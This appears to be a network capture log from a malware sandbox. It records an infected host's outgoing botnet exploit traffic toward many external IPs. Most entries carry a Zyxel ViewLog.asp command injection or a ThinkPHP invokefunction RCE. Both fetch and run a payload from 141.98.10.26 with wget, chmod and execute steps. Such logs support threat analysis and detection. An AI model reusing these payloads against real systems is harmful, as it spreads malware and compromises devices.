Nov 22, 2023 08:39:51.578178883 CET	14774	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
726	192.168.2.23	39050	94.26.10.147	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:51.762550116 CET	14777	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:51.977982998 CET	14782	IN	HTTP/1.1 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
727	192.168.2.23	42090	94.120.211.63	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:51.792484999 CET	14778	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
728	192.168.2.23	60398	94.122.63.69	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:51.796555042 CET	14779	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
729	192.168.2.23	36088	94.122.193.30	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:51.804724932 CET	14779	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
730	192.168.2.23	55720	112.197.130.136	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:52.524364948 CET	14839	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:52.918390989 CET	14845	IN	HTTP/1.0 400 Bad Request Date: Wed, 22 Nov 2023 14:39:52 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
731	192.168.2.23	38134	112.126.169.213	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:52.840267897 CET	14844	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:53.154979944 CET	14907	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:35:05 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
732	192.168.2.23	56748	112.126.146.172	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:53.158272982 CET	14908	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:53.477664948 CET	14957	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:32:54 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
733	192.168.2.23	47328	112.47.32.218	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:53.317708969 CET	14944	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:54.545557976 CET	15137	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:54.944714069 CET	15149	IN	HTTP/1.1 400 Bad Request Server: Byte-nginx Date: Wed, 22 Nov 2023 07:39:54 GMT Content-Type: text/html Content-Length: 230 Connection: close via: cache03.qzcm02 x-request-ip: 89.149.18.60 x-tt-trace-tag: id=5 x-response-cinfo: 89.149.18.60 x-response-cache: miss Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 42 79 74 65 2d 6e 67 69 6e 78 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr/>Powered by Byte-nginx<hr><center>tengine</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
734	192.168.2.23	37894	62.29.76.124	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.292435884 CET	15109	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
735	192.168.2.23	33460	94.197.137.155	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.292505026 CET	15109	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
736	192.168.2.23	33910	94.120.11.187	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.292563915 CET	15110	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
737	192.168.2.23	46654	62.29.88.19	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.292633057 CET	15110	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
738	192.168.2.23	35816	95.210.82.4	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.470561028 CET	15117	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
739	192.168.2.23	40248	31.136.50.2	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.480292082 CET	15131	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:55.074337959 CET	15155	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:56.226195097 CET	15278	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:58.721865892 CET	15623	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:03.329195976 CET	16162	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:12.543952942 CET	17330	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:31.485361099 CET	19597	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:08.344255924 CET	19783	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
740	192.168.2.23	52752	95.86.92.146	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.526910067 CET	15136	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
741	192.168.2.23	41622	31.136.85.151	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:54.664433956 CET	15139	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:55.234349012 CET	15158	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:56.354161978 CET	15303	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:58.721872091 CET	15623	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
